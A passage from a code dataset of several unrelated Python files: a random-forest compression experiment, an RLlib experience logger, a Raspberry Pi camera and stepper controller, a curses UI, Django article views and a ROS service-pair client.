"call"}, {"api_name": "matplotlib.pyplot", "line_number": 183, "usage_type": "name"}, {"api_name": "util_graficos.inserirValoresNasBarras", "line_number": 186, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 190, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 190, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 191, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 191, "usage_type": "name"}, {"api_name": "util_graficos.inserirValoresNasBarras", "line_number": 194, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 198, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 198, "usage_type": "name"}]}
+{"seq_id": "651218657", "text": "import numpy as np\nimport metrics\nimport datasets\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.model_selection import KFold\nfrom hypothesis import TreeHypothesis\nfrom consistency import MCConsistentTree\nfrom hypothesis_search import MCHypothesisSearch\nfrom algorithms import crembo\n\n\ndef compress_tree(n_estimators, max_tree_depth, max_forest_depth, X_train, y_train, c, weight=None, X_val=None,\n y_val=None, score=None, delta=1):\n # All but MED are trained on x_val as well\n X_train = np.concatenate([X_train, X_val], axis=0)\n y_train = np.concatenate([y_train, y_val], axis=0)\n\n # train benchmark tree\n b_tree = DecisionTreeClassifier(max_depth=max_tree_depth, class_weight=weight)\n b_tree.fit(X_train, y_train)\n f_b = TreeHypothesis('Tree_bench', b_tree)\n\n # train random forest to create a collection of hypotheses\n rf = RandomForestClassifier(n_estimators=n_estimators, max_depth=max_forest_depth, class_weight=weight)\n rf.fit(X_train, y_train)\n\n # get trees from forest\n hypotheses = []\n for i in range(len(rf.estimators_)):\n name = f'Tree_{i}'\n hypotheses.append(TreeHypothesis(name, f=rf.estimators_[i]))\n\n # define consistency and hypothesis search algorithms\n consistency = MCConsistentTree(depth=max_tree_depth, class_weight=weight)\n a = MCHypothesisSearch(consistency, X_val=X_val, y_val=y_val, score=score)\n\n f_med, depth, y1 = crembo(s=X_train, t=hypotheses, c=c, a=a, delta=delta)\n\n # train a tree with all the data labels from MCMA\n tree = DecisionTreeClassifier(max_depth=max_tree_depth, class_weight=weight)\n tree.fit(X_train, y1)\n f_voting = TreeHypothesis('Tree_voting', tree)\n\n return rf, hypotheses, f_med, f_voting, f_b\n\n\ndef robustness_agreement_exp(dataset, max_tree_depth, forest_depth, num_trees, num_experiments=1,\n score='accuracy', weight=None, n_splits=10, delta=1):\n scores = []\n means = []\n for i in range(num_experiments):\n agreement, mean_score = robustness_exp(dataset, max_tree_depth, forest_depth, num_trees, num_experiments=1,\n score=score, weight=weight, n_splits=n_splits, use_agreement=True, delta=delta)\n means.append(mean_score)\n scores.append(agreement)\n\n print('\\nFinal results:')\n scores = np.asarray(scores)\n scores = scores.mean(axis=0)\n print(f'Average Agreement score: RF {scores[0]}, BM {scores[1]}, VT {scores[2]}, MED {scores[3]}')\n\n\ndef robustness_exp(dataset, max_tree_depth, forest_depth, num_trees, num_experiments=1,\n score='accuracy', weight=None, n_splits=10, use_agreement=False, delta=1):\n\n kf_scores = []\n kf = KFold(n_splits=n_splits)\n x, y, X_test, y_test = datasets.prepare_data(dataset, return_test=True)\n c = datasets.get_number_of_classes(dataset)\n score_func, score_metric = metrics.get_socre_foncs(score)\n\n trees = []\n for train, test in kf.split(x):\n X_train, _, y_train, _ = x[train], x[test], y[train], y[test]\n X_train, X_val, y_train, y_val = datasets.prepare_val(X_train, y_train)\n k_scores = []\n for k in range(num_experiments):\n rf, _, f_med, f_all, f_m = compress_tree(num_trees, max_tree_depth, forest_depth, X_train, y_train,\n c, weight=weight, X_val=X_val, y_val=y_val,\n score=score_metric, delta=delta)\n\n k_scores.append(score_func(rf, None, f_med, f_all, f_m, X_train, y_train, X_test, y_test))\n\n trees.append((rf, f_m, f_all, f_med))\n kf_scores.append(metrics.average_scores(k_scores, num_experiments))\n\n means = metrics.mean_and_std(kf_scores, mean_only=True)\n output = 
metrics.agreement_score(trees, X_test) if use_agreement else None\n return output, means\n\n\ndef generalization_exp(dataset, max_tree_depth, forest_depth, num_trees, num_experiments=1,\n score='accuracy', weight=None, n_splits=10, delta=1):\n\n kf_scores = []\n kf = KFold(n_splits=n_splits)\n x, y, _, _, = datasets.prepare_data(dataset, return_test=False)\n c = datasets.get_number_of_classes(dataset)\n score_func, score_metric = metrics.get_socre_foncs(score)\n\n for k in range(num_experiments):\n f_scores = []\n for train, test in kf.split(x):\n X_train, X_test, y_train, y_test = x[train], x[test], y[train], y[test]\n X_train, X_val, y_train, y_val = datasets.prepare_val(X_train, y_train)\n rf, _, f_med, f_all, f_m = compress_tree(num_trees, max_tree_depth, forest_depth, X_train, y_train,\n c, weight=weight, X_val=X_val, y_val=y_val,\n score=score_metric, delta=delta)\n\n f_scores.append(score_func(rf, None, f_med, f_all, f_m, X_train, y_train, X_test, y_test))\n\n mean_var_win = metrics.mean_and_std(f_scores, mean_only=False)\n kf_scores.append(mean_var_win)\n\n print('\\nFinal results:')\n print(f'Average RF mean {sum([score[0] for score in kf_scores]) / num_experiments}, var {sum([score[1] for score in kf_scores]) / num_experiments}')\n idx = 2\n for t in ('BM', 'VT', 'MED'):\n t_mean = sum([score[idx] for score in kf_scores]) / num_experiments\n t_wins = sum([score[idx + 2] for score in kf_scores]) / num_experiments\n idx += 3\n print(f'Average {t} mean {t_mean}, wins {t_wins}')\n\n return\n", "sub_path": "rf_compression.py", "file_name": "rf_compression.py", "file_ext": "py", "file_size_in_byte": 5573, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "numpy.concatenate", "line_number": 16, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 17, "usage_type": "call"}, {"api_name": "sklearn.tree.DecisionTreeClassifier", "line_number": 20, "usage_type": "call"}, {"api_name": "hypothesis.TreeHypothesis", "line_number": 22, "usage_type": "call"}, {"api_name": "sklearn.ensemble.RandomForestClassifier", "line_number": 25, "usage_type": "call"}, {"api_name": "hypothesis.TreeHypothesis", "line_number": 32, "usage_type": "call"}, {"api_name": "consistency.MCConsistentTree", "line_number": 35, "usage_type": "call"}, {"api_name": "hypothesis_search.MCHypothesisSearch", "line_number": 36, "usage_type": "call"}, {"api_name": "algorithms.crembo", "line_number": 38, "usage_type": "call"}, {"api_name": "sklearn.tree.DecisionTreeClassifier", "line_number": 41, "usage_type": "call"}, {"api_name": "hypothesis.TreeHypothesis", "line_number": 43, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 59, "usage_type": "call"}, {"api_name": "sklearn.model_selection.KFold", "line_number": 68, "usage_type": "call"}, {"api_name": "datasets.prepare_data", "line_number": 69, "usage_type": "call"}, {"api_name": "datasets.get_number_of_classes", "line_number": 70, "usage_type": "call"}, {"api_name": "metrics.get_socre_foncs", "line_number": 71, "usage_type": "call"}, {"api_name": "datasets.prepare_val", "line_number": 76, "usage_type": "call"}, {"api_name": "metrics.average_scores", "line_number": 86, "usage_type": "call"}, {"api_name": "metrics.mean_and_std", "line_number": 88, "usage_type": "call"}, {"api_name": "metrics.agreement_score", "line_number": 89, "usage_type": "call"}, {"api_name": "sklearn.model_selection.KFold", "line_number": 97, "usage_type": "call"}, {"api_name": "datasets.prepare_data", 
"line_number": 98, "usage_type": "call"}, {"api_name": "datasets.get_number_of_classes", "line_number": 99, "usage_type": "call"}, {"api_name": "metrics.get_socre_foncs", "line_number": 100, "usage_type": "call"}, {"api_name": "datasets.prepare_val", "line_number": 106, "usage_type": "call"}, {"api_name": "metrics.mean_and_std", "line_number": 113, "usage_type": "call"}]}
+{"seq_id": "216255556", "text": "\"\"\"Collect and save experiencies in IndustrialBenchmark with a behaviour policy.\"\"\"\nimport click\nimport numpy as np\nfrom ib_behavior_policy import IBBehaviorPolicy\nfrom ray.rllib.evaluation.sample_batch_builder import SampleBatchBuilder\nfrom ray.rllib.offline.json_writer import JsonWriter\nfrom tqdm import trange\n\nfrom raylab.envs.registry import _industrial_benchmark_maker\n\n\n@click.command()\n@click.option(\n \"--local-dir\",\n \"-l\",\n type=click.Path(exists=False, file_okay=False, dir_okay=True, resolve_path=True),\n default=\"data/\",\n show_default=True,\n help=\"\",\n)\ndef main(local_dir):\n \"\"\"Main loop based on `rllib.examples.saving_experiences`.\"\"\"\n # pylint: disable=too-many-locals\n batch_builder = SampleBatchBuilder()\n writer = JsonWriter(local_dir)\n env = _industrial_benchmark_maker({\"max_episode_steps\": 1000})\n policy = IBBehaviorPolicy(env.observation_space, env.action_space, {})\n\n for eps_id in trange(100):\n obs = env.reset()\n prev_action = np.zeros_like(env.action_space.sample())\n prev_reward = 0\n done = False\n time = 0\n while not done:\n action, _, _ = policy.compute_single_action(obs, [])\n new_obs, rew, done, info = env.step(action)\n batch_builder.add_values(\n t=time,\n eps_id=eps_id,\n agent_index=0,\n obs=obs,\n actions=action,\n action_prob=1.0, # put the true action probability here\n rewards=rew,\n prev_actions=prev_action,\n prev_rewards=prev_reward,\n dones=done,\n infos=info,\n new_obs=new_obs,\n )\n obs = new_obs\n prev_action = action\n prev_reward = rew\n time += 1\n writer.write(batch_builder.build_and_reset())\n\n\nif __name__ == \"__main__\":\n main() # pylint: disable=no-value-for-parameter\n", "sub_path": "examples/BatchRL/ib_save_experiences.py", "file_name": "ib_save_experiences.py", "file_ext": "py", "file_size_in_byte": 1972, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "ray.rllib.evaluation.sample_batch_builder.SampleBatchBuilder", "line_number": 24, "usage_type": "call"}, {"api_name": "ray.rllib.offline.json_writer.JsonWriter", "line_number": 25, "usage_type": "call"}, {"api_name": "raylab.envs.registry._industrial_benchmark_maker", "line_number": 26, "usage_type": "call"}, {"api_name": "ib_behavior_policy.IBBehaviorPolicy", "line_number": 27, "usage_type": "call"}, {"api_name": "tqdm.trange", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.zeros_like", "line_number": 31, "usage_type": "call"}, {"api_name": "click.command", "line_number": 12, "usage_type": "call"}, {"api_name": "click.option", "line_number": 13, "usage_type": "call"}, {"api_name": "click.Path", "line_number": 16, "usage_type": "call"}]}
+{"seq_id": "169527426", "text": "import pysony\nimport board, neopixel\nimport time\nimport urllib.request as req\nimport RPi.GPIO as GPIO\nfrom pathlib import Path\n\nclass FixtureInspectorController:\n QX_ADDR = \"http://192.168.122.1:8080\"\n\n search = None\n cameras = None\n camera = None\n\n halfstep = 0\n control_pins = [22, 24, 23, 25]\n halfstep_seq = [\n [1,0,0,0],\n [1,1,0,0],\n [0,1,0,0],\n [0,1,1,0],\n [0,0,1,0],\n [0,0,1,1],\n [0,0,0,1],\n [1,0,0,1]\n ]\n\n def __init__(self):\n self.setupCam()\n self.setupStepmotor()\n\n def setupCam(self):\n # print(\"Searching for camera...\")\n\n # self.search = pysony.ControlPoint(interface=\"wlan0\")\n # self.cameras = self.search.discover()\n\n # if len(self.cameras):\n # print(\"Found: %s\" % self.cameras[0])\n # print(\"\")\n # self.camera = pysony.SonyAPI(QX_ADDR=self.cameras[0])\n # else:\n # print(\"No camera found, aborting\")\n # quit()\n self.camera = pysony.SonyAPI(QX_ADDR=self.QX_ADDR)\n\n self.camera.startRecMode()\n time.sleep(5)\n\n self.camera.setFocusMode('AF-S')\n self.camera.setPostviewImageSize('Original')\n self.camera.setFNumber('22')\n self.camera.setIsoSpeedRate('100')\n self.camera.setShutterSpeed('1/20')\n self.camera.setTouchAFPosition([50.0, 50.0])\n\n\n def setupStepmotor(self):\n for pin in self.control_pins:\n GPIO.setup(pin, GPIO.OUT)\n GPIO.output(pin, 0)\n \n # 1 halfstep is 0.9 degree\n # 100 halfstep is 90 degree\n def Stepmotor(self, step):\n for i in range(abs(step)):\n for pin in range(4):\n GPIO.output(self.control_pins[pin], self.halfstep_seq[self.halfstep][pin])\n\n if step > 0:\n self.halfstep += 1\n if self.halfstep == 8:\n self.halfstep = 0\n else:\n self.halfstep -= 1\n if self.halfstep == -1:\n self.halfstep = 7\n\n time.sleep(0.001)\n \n def Stepmotor_idle(self):\n for pin in range(4):\n GPIO.output(self.control_pins[pin], GPIO.LOW)\n\n def resetStep(self):\n self.halfstep = 0\n\n def TakePicture(self, filename=\"image.jpg\"):\n res = self.camera.actTakePicture()\n res = req.urlretrieve(res['result'][0][0].replace('\\/', '/'), filename)\n\nif __name__ == '__main__':\n filename = \".jpg\"\n\n fictrl = FixtureInspectorController()\n \n fictrl.pixelOn()\n\n st0 = time.time()\n for i in range(100):\n st1 = time.time()\n fictrl.camera.setTouchAFPosition([50.0, 50.0])\n for j in range(4):\n print('i : ' + str(i) + ' j : ' + str(j))\n st2 = time.time()\n res = fictrl.camera.actTakePicture()\n print('picture taken : ' + str(time.time()-st2))\n res = req.urlretrieve(res['result'][0][0].replace('\\/', '/'),\n str(Path.cwd()) + \"/temp_\" + str(100).zfill(4) + \"/\" + str(j).zfill(3) + '_' + str(i).zfill(3) + filename)\n print('image download : ' + str(time.time()-st2))\n fictrl.Stepmotor(-100)\n print('motor rotated : ' + str(time.time()-st2))\n print('a cycle done : ' + str(time.time()-st1))\n fictrl.pixelOff()\n", "sub_path": "fixins/fixinsctrl.py", "file_name": "fixinsctrl.py", "file_ext": "py", "file_size_in_byte": 2973, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "pysony.SonyAPI", "line_number": 45, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 48, "usage_type": "call"}, {"api_name": "RPi.GPIO.setup", "line_number": 60, "usage_type": "call"}, {"api_name": "RPi.GPIO", "line_number": 60, "usage_type": "name"}, {"api_name": "RPi.GPIO.OUT", "line_number": 60, "usage_type": "attribute"}, {"api_name": "RPi.GPIO.output", "line_number": 61, "usage_type": "call"}, {"api_name": "RPi.GPIO", "line_number": 61, 
"usage_type": "name"}, {"api_name": "RPi.GPIO.output", "line_number": 68, "usage_type": "call"}, {"api_name": "RPi.GPIO", "line_number": 68, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 79, "usage_type": "call"}, {"api_name": "RPi.GPIO.output", "line_number": 83, "usage_type": "call"}, {"api_name": "RPi.GPIO", "line_number": 83, "usage_type": "name"}, {"api_name": "RPi.GPIO.LOW", "line_number": 83, "usage_type": "attribute"}, {"api_name": "urllib.request.urlretrieve", "line_number": 90, "usage_type": "call"}, {"api_name": "urllib.request", "line_number": 90, "usage_type": "name"}, {"api_name": "time.time", "line_number": 99, "usage_type": "call"}, {"api_name": "time.time", "line_number": 101, "usage_type": "call"}, {"api_name": "time.time", "line_number": 105, "usage_type": "call"}, {"api_name": "time.time", "line_number": 107, "usage_type": "call"}, {"api_name": "urllib.request.urlretrieve", "line_number": 108, "usage_type": "call"}, {"api_name": "urllib.request", "line_number": 108, "usage_type": "name"}, {"api_name": "pathlib.Path.cwd", "line_number": 109, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 109, "usage_type": "name"}, {"api_name": "time.time", "line_number": 110, "usage_type": "call"}, {"api_name": "time.time", "line_number": 112, "usage_type": "call"}, {"api_name": "time.time", "line_number": 113, "usage_type": "call"}]}
+{"seq_id": "327510687", "text": "#!/usr/bin/python\n\nimport commands\nimport curses\nimport time\nimport threading\n\nclass CursesUI(threading.Thread):\n \"\"\"A curses UI or talking to a driver via client\"\"\"\n def __init__(self, allow_input):\n \"\"\"Initializes ncurses\"\"\"\n threading.Thread.__init__(self, name='curses-ui')\n\n # used to stop the UI loop\n self._stop = threading.Event()\n\n # if False, ignore all comnmands, just print status\n self.allow_input = allow_input\n\n # keep track of the last keystroke\n # it is cleared and returned by get_command\n self._last_key = None\n\n def init(self):\n \"\"\"Sets up ncurses and creates all the windows\"\"\"\n #initialize ncurses\n self.stdscr = curses.initscr()\n self.windows = {'stdscr':self.stdscr}\n\n curses.start_color()\n curses.noecho()\n curses.cbreak()\n self.stdscr.keypad(1)\n\n curses.curs_set(0)\n curses.halfdelay(1)\n\n #initialize the status and result windows\n self.windows['time'] = self.create_window(' Time ', 3, 82, 0, 0)\n\n self.windows['driver'] = self.create_window(' Driver Status ', 12, 40, 3, 0)\n self.windows['monitor'] = self.create_window(' Monitor Status ', 12, 40, 3, 41)\n self.windows['arduino'] = self.create_window(' Arduino Status ', 10, 40, 14, 0)\n self.windows['sensors'] = self.create_window(' Sensor Status ', 10, 40, 14, 41)\n self.windows['result'] = self.create_window(' Last Result ', 3, 82, 25, 0)\n\n def cleanup(self):\n \"\"\"Clean up ncurses\"\"\"\n self.stdscr.keypad(0)\n curses.nocbreak()\n curses.echo()\n\n curses.endwin()\n\n def run(self):\n \"\"\"The main loop\"\"\"\n while not self._stop.is_set():\n self.write_line(self.windows['time'], 1, \"%.2f\" % time.time(), align = 'center')\n for window in self.windows.values():\n window.refresh()\n\n if self.allow_input:\n try:\n self._last_key = self.stdscr.getkey()\n except:\n pass\n\n def stop(self):\n \"\"\"Stops the UI loop\"\"\"\n self._stop.set()\n self.join()\n self.cleanup()\n\n def create_window(self, title, height, width, top, left, border = True):\n \"\"\"Creates a window\"\"\"\n window = curses.newwin(height, width, top, left)\n\n if border:\n window.box()\n if title:\n self.write_line(window, 0, title, left_margin = 3, nopad = True)\n\n self.windows['stdscr'].refresh()\n return window\n\n def write_key_value(self, window, linenum, key, value):\n \"\"\"Properly formats and writes a key-value pair\"\"\"\n key = str(key)\n value = str(value)\n\n max_width = window.getmaxyx()[1] - 2 #subtract 2 for borders\n key_len = max_width - len(value) - 1 #subtract 1 for the space between k and v\n\n line = \"%s %s\" % (key[:key_len].ljust(key_len), value)\n self.write_line(window, linenum, line)\n\n def write_line(self, window, linenum, line, align = 'left', left_margin = 1, right_margin = 1, nopad = False):\n \"\"\"Writes a line in the specified window\"\"\"\n h, w = window.getmaxyx()\n if linenum > h:\n return\n\n #truncate the string to fit perfectly inside the window\n if not nopad:\n length = w - left_margin - right_margin\n # first trim too-long lines\n line = line[:w-2]\n\n # next justify the line\n align_fun = {\n 'left':line.ljust,\n 'right':line.rjust,\n 'center':line.center,\n }\n line = align_fun[align](length)\n\n window.addstr(linenum, left_margin, line)\n\n def write_result(self, result):\n self.write_line(self.windows['result'], 1, str(result))\n\n def update_status(self, status):\n \"\"\"puts the current status into the status windows\"\"\"\n for cat, s in status.items():\n if cat == 'sensors':\n continue\n\n window = 
self.windows[cat]\n linenum = 1\n for key, val in s.items():\n if key == 'alerts':\n # print out monitor alerts\n self.write_line(window, linenum, 'Alerts:')\n linenum += 1\n for k, v in val.items():\n self.write_key_value(window, linenum, ' '+k, v)\n linenum += 1\n else:\n self.write_key_value(window, linenum, key, val)\n linenum += 1\n\n sen_line = 1\n for sen in status['sensors']:\n val = \"%s%s\" % (sen['value'], sen['units'])\n self.write_key_value(self.windows['sensors'], sen_line, sen['name'], val)\n sen_line += 1\n\n def get_command(self):\n \"\"\"Returns the user's last command\"\"\"\n try:\n if self._last_key == 'q':\n return commands.Quit()\n elif self._last_key == 'g':\n return commands.Go()\n elif self._last_key == 'r':\n return commands.Reset()\n elif self._last_key == 's':\n return commands.Stop()\n elif self._last_key == 't':\n return commands.Shutdown()\n elif self._last_key == 'b':\n return commands.Brake(1)\n elif self._last_key == 'h':\n return commands.Hold()\n elif self._last_key == 'KEY_LEFT':\n return commands.Steer(direction=-1)\n elif self._last_key == 'KEY_RIGHT':\n return commands.Steer(direction=1)\n elif self._last_key == 'KEY_DOWN':\n return commands.Drive(speed=-1)\n elif self._last_key == 'KEY_UP':\n return commands.Drive(speed=1)\n\n else:\n return None\n\n finally:\n self._last_key = None\n self.cleanup()\n\n def error_notify(self, error):\n \"\"\"Displays the error in the results window\"\"\"\n self.write_result(\"Error at %.2f: %s\" % (time.time(), str(error)))\n\ndef get_ui(allow_input, **rest):\n return CursesUI(allow_input)\n\nif __name__ == \"__main__\":\n ui = get_ui()\n ui.init()\n\n ui.start()\n try:\n while True:\n time.sleep(0.05)\n\n command = ui.get_command()\n if not command:\n continue\n if type(command) == commands.Quit:\n break\n else:\n ui.write_result(\"command was %s\" % str(command))\n finally:\n ui.stop()\n\n\n", "sub_path": "client/cursesui.py", "file_name": "cursesui.py", "file_ext": "py", "file_size_in_byte": 6658, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "threading.Thread", "line_number": 8, "usage_type": "attribute"}, {"api_name": "threading.Thread.__init__", "line_number": 12, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 12, "usage_type": "attribute"}, {"api_name": "threading.Event", "line_number": 15, "usage_type": "call"}, {"api_name": "curses.initscr", "line_number": 27, "usage_type": "call"}, {"api_name": "curses.start_color", "line_number": 30, "usage_type": "call"}, {"api_name": "curses.noecho", "line_number": 31, "usage_type": "call"}, {"api_name": "curses.cbreak", "line_number": 32, "usage_type": "call"}, {"api_name": "curses.curs_set", "line_number": 35, "usage_type": "call"}, {"api_name": "curses.halfdelay", "line_number": 36, "usage_type": "call"}, {"api_name": "curses.nocbreak", "line_number": 50, "usage_type": "call"}, {"api_name": "curses.echo", "line_number": 51, "usage_type": "call"}, {"api_name": "curses.endwin", "line_number": 53, "usage_type": "call"}, {"api_name": "time.time", "line_number": 58, "usage_type": "call"}, {"api_name": "curses.newwin", "line_number": 76, "usage_type": "call"}, {"api_name": "commands.Quit", "line_number": 152, "usage_type": "call"}, {"api_name": "commands.Go", "line_number": 154, "usage_type": "call"}, {"api_name": "commands.Reset", "line_number": 156, "usage_type": "call"}, {"api_name": "commands.Stop", "line_number": 158, "usage_type": "call"}, {"api_name": 
"commands.Shutdown", "line_number": 160, "usage_type": "call"}, {"api_name": "commands.Brake", "line_number": 162, "usage_type": "call"}, {"api_name": "commands.Hold", "line_number": 164, "usage_type": "call"}, {"api_name": "commands.Steer", "line_number": 166, "usage_type": "call"}, {"api_name": "commands.Steer", "line_number": 168, "usage_type": "call"}, {"api_name": "commands.Drive", "line_number": 170, "usage_type": "call"}, {"api_name": "commands.Drive", "line_number": 172, "usage_type": "call"}, {"api_name": "time.time", "line_number": 183, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 195, "usage_type": "call"}, {"api_name": "commands.Quit", "line_number": 200, "usage_type": "attribute"}]}
+{"seq_id": "631547177", "text": "from django.http import HttpResponse\n\narticles_list = [\n [1, \"Айви Яптанго\", 2020, \"Самые шикарные парочки знаменитостей 2019 года\", [\"красота\", \"гороскопы\"]],\n [2, \"Лео Месси\", 2014, \"Un Abrazo a Todos\", [\"лайфстайл\", \"недвижимость\"]],\n [3, \"Гэри Паска\", 2016, \"Продаётся дом в Южной Флориде за $2,695\", [\"недвижимость\", \"коучинг\", \"howto\"]],\n [4, \"Роби Тобинсон\", 1967, \"7 лет я применял этот трюк и назад пути нет\", [\"лайфхак\", \"коучинг\", \"howto\"]],\n [5, \"Металлий Вутко\", 2017, \"Let Me Speak From My Heart\", [\"футбол\", \"допинг\"]],\n [6, \"Роби Тобинсон\", 1977, \"Беспроигрышная древнеримская техника обольщения\", [\"отношения\", \"история\", \"howto\"]],\n [7, \"Роби Тобинсон\", 2022, \"3 способа установить девайс от храпа\", [\"здоровье\", \"коучинг\", \"howto\"]],\n [8, \"Роби Тобинсон\", 1975, \"Интимная проблема, которой втайне озабочены все ваши друзья\", [\"отношения\", \"здоровье\", \"howto\"]],\n [9, \"Elina Shake\", 2008, \"Представления, основанные на классах\", [\"python\", \"howto\", \"лайфхак\"]],\n [10, \"Бен Ф��анклин\", 1753, \"Электрические стодолларовые купюры\", [\"фондовая биржа\", \"рынки\", \"электричество\"]],\n [11, \"Роби Тобинсон\", 2012, \"5 забавных Django Apps, о которых говорят все\", [\"django\", \"IT\", \"howto\"]],\n [12, \"Металлий Вутко\", 2017, \"No Problems, No Criminality\", [\"допинг\", \"недвижимость\"]],\n [13, \"Роби Тобинсон\", 1987, \"7 способов до смерти напугать своего босса в пятницу 13-го\", [\"работа\", \"мистика\", \"howto\"]],\n [14, \"Твентин Карантино\", 2007, \"Четыре сервера\", [\"кино\", \"django\", \"мистика\"]],\n]\n\n\n# в функции generate_html()\n# оформим перечень статей в виде html-списка\ndef generate_html(articles):\n if len(articles) == 0:\n return 'По вашему запросу не найдено ни одной статьи!
'\n else:\n base_html = 'Статьи по вашему запросу:
'\n for article in articles:\n list_item = f'' \\\n f'- {article[3]}
' \\\n f'- автор: {article[1]}
' \\\n f'- год: {article[2]}
' \\\n f'- теги: {\", \".join(article[4])}
' \\\n f'
'\n base_html += list_item\n base_html += '
'\n return base_html\n\n\n# на случай, если в адресе не указан год - установим значение year=-1\ndef dashboard(request, year=-1):\n found_articles = []\n if year == -1:\n # если в адресе не указан год,\n # записываем в found_articles все статьи нашего блога\n found_articles = articles_list\n else:\n for article in articles_list:\n if year == article[2]:\n found_articles.append(article)\n beautiful_html = generate_html(found_articles)\n return HttpResponse(beautiful_html)\n\n\ndef article_by_id(request, id):\n found_articles = []\n for article in articles_list:\n if id == article[0]:\n found_articles.append(article)\n beautiful_html = generate_html(found_articles)\n return HttpResponse(beautiful_html)\n\n\ndef articles_by_tag(request, tag):\n found_articles = []\n for article in articles_list:\n if tag in article[4]:\n found_articles.append(article)\n beautiful_html = generate_html(found_articles)\n return HttpResponse(beautiful_html)\n\n", "sub_path": "articles/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 4230, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "django.http.HttpResponse", "line_number": 52, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 61, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 70, "usage_type": "call"}]}
+{"seq_id": "568614897", "text": "#\n# License: BSD\n# https://raw.github.com/robotics-in-concert/rocon_tools/license/LICENSE\n#\n##############################################################################\n# Imports\n##############################################################################\n\nimport threading\nimport time\nimport rospy\nimport uuid\nimport unique_id\nimport functools\n\n# Local imports\nfrom .exceptions import ServicePairException\n\n##############################################################################\n# Request Handlers\n##############################################################################\n\n\nclass RequestHandlerBase(object):\n\n def __init__(self, key):\n self.key = key # uuid hexstring key (the request_handlers key)\n self.response = None\n\n\nclass BlockingRequestHandler(RequestHandlerBase):\n\n def __init__(self, key):\n super(BlockingRequestHandler, self).__init__(key)\n self.event = threading.Event()\n\n\nclass NonBlockingRequestHandler(RequestHandlerBase):\n\n def __init__(self, key, callback, error_callback):\n super(NonBlockingRequestHandler, self).__init__(key)\n self.timer = None\n self.callback = callback\n self.error_callback = error_callback\n\n def copy(self):\n '''\n The deepcopy function has some issues (related to threads),\n so using this independant copy method here. Note that this only\n ever gets used for non-blocking calls to help handle the\n race conditions between timeout handling and normal callback\n handling\n '''\n new_copy = NonBlockingRequestHandler(self.key, self.callback, self.error_callback)\n new_copy.timer = self.timer\n return new_copy\n\n##############################################################################\n# Client Class\n##############################################################################\n\n\nclass ServicePairClient(object):\n '''\n The client side of a pubsub service pair.\n '''\n __slots__ = [\n '_publisher',\n '_subscriber',\n '_request_handlers', # initiate, track and execute requests with these { hex string ids : dic of RequestHandler objects (Blocking/NonBlocking) }\n 'ServicePairSpec',\n 'ServicePairRequest',\n 'ServicePairResponse',\n '_lock' # prevent race conditions in handling of non-blocking callbacks and timeouts.\n ]\n\n ##########################################################################\n # Initialisation\n ##########################################################################\n\n def __init__(self, name, ServicePairSpec):\n '''\n @param name : resource name of service pair (e.g. testies for pair topics testies/request, testies/response)\n @type str\n @param ServicePairSpec : the pair type (e.g. 
rocon_service_pair_msgs.msg.TestiesPair)\n @type str\n '''\n try:\n p = ServicePairSpec()\n self.ServicePairSpec = ServicePairSpec\n self.ServicePairRequest = type(p.pair_request)\n self.ServicePairResponse = type(p.pair_response)\n except AttributeError:\n raise ServicePairException(\"Type is not an pair spec: %s\" % str(ServicePairSpec))\n self._lock = threading.Lock()\n self._subscriber = rospy.Subscriber(name + \"/response\", self.ServicePairResponse, self._internal_callback)\n self._publisher = rospy.Publisher(name + \"/request\", self.ServicePairRequest)\n self._request_handlers = {} # [uuid_msgs/UniqueId]\n\n def wait_for_service(self, timeout):\n '''\n Waits for the service pair server to appear.\n\n @param timeout : time to wait for data\n @type rospy.Duration\n\n @raise ROSException: if specified timeout is exceeded\n @raise ROSInterruptException: if shutdown interrupts wait\n '''\n timeout_time = time.time() + timeout.to_sec()\n while not rospy.is_shutdown() and time.time() < timeout_time:\n if self._subscriber.get_num_connections() > 0 and self._publisher.get_num_connections() > 0:\n return\n rospy.rostime.wallsleep(0.1)\n if rospy.is_shutdown():\n raise rospy.ROSInterruptException(\"rospy shutdown\")\n else:\n raise rospy.ROSException(\"timeout exceeded while waiting for service pair server %s\" % self._subscriber.resolved_name[:-len('/response')])\n\n ##########################################################################\n # Execute Blocking/NonBlocking\n ##########################################################################\n\n def __call__(self, msg, timeout=None, callback=None, error_callback=None):\n '''\n Initiates and executes the client request to the server. The type of arguments\n supplied determines whether to apply blocking or non-blocking behaviour.\n\n @param msg : the request message\n @type Request\n\n @param timeout : time to wait for data\n @type rospy.Duration\n\n @param callback : user callback invoked for responses of non-blocking calls\n @type method with arguments (uuid_msgs.UniqueID, Response)\n\n @return msg/id : for blocking calls it is the response message, for non-blocking it is the unique id\n @rtype Response/uuid_msgs.UniqueID\n '''\n pair_request_msg = self.ServicePairRequest()\n pair_request_msg.id = unique_id.toMsg(unique_id.fromRandom())\n pair_request_msg.request = msg\n key = unique_id.toHexString(pair_request_msg.id)\n if callback == None and error_callback == None:\n self._request_handlers[key] = BlockingRequestHandler(key)\n return 